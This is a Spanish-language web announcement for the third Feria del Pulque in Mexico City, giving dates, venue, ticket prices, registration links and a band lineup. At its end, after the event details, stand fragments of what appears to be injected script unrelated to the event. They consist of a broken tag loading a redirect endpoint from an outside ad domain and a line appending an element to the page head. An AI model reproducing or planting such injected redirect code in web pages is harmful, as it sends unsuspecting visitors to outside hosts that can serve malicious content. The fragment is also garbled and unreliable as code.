¿Listo para la Tercera Edición de la Feria del Pulque?

Debido al éxito obtenido en las ediciones pasadas y manteniendo la firme convicción de seguir promoviendo la cultura del pulque y servir como plataforma para los productores, s22 trae una edición más de la FERIA DEL PULQUE.

La cita es éste 29, 30 de abril y 1 de mayo, en ForoS22: Héroes Ferricarrileros Col. Buenavista, a una calle del metrobus el chopo y el metro Buenavista de 11 am a 7 pm. Regresamos con mucho pulque y bandas estelares.

Se reunirá nuevamente a la escena pulquera con alrededor de 25 pulquerías y en ésta ocasión realizaremos un homenaje a uno de los grandes pulqueros de México que nos honrara con su presencia, “El Pifas” dueño de La Hija de los Apaches estará con nosotros en la 3° Feria del pulque.

El acceso al evento tendrá un costo de $20 y manejaremos un pre-registro para las personas que quieran evitar filas, limitado a 3 mil registros previos por día al cual podrás acceder mediante el siguiente link http://bit.ly/1SYygZd. Contaremos con Boletos VIP $100 + comisión que incluyen acceso a la Feria del Pulque (1 día) vaso conmemorativo de cristal con pulque,  postal conmemorativa, acceso VIP (sin filas) acceso a conciertos  y acceso a conferencias, estos boletos se podrán adquirir en el siguiente link https://feriadelpulque.boletia.com/

Ven a probar curados, pulque natural directo de los productores, como siempre mucha comida, bebidas artesanales, y bandas de rock en vivo. Para mayor información visita la página en Facebook

https://www.facebook.com/feriadelpulque

 

Tocarán:

TOLIDOS en set acústico  Viernes 29 de abril

LA MATATENA Sábado 30 de abril

FENÓMENO FUZZ Domingo 1 de mayo.

 

3° FERIA DEL PULQUE

Acceso: $20

Viernes 29, sábado 30 de abril y 1° de mayo. 11 am a 7 pm

ForoS22: Héroes Ferrocarrileros Col. Buenavista, a una calle del metrobus el chopo y el metro Buenavista

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

d.getElementsByTagName(‘head’)[0].appendChild(s);

Etiquetas:|
Comentarios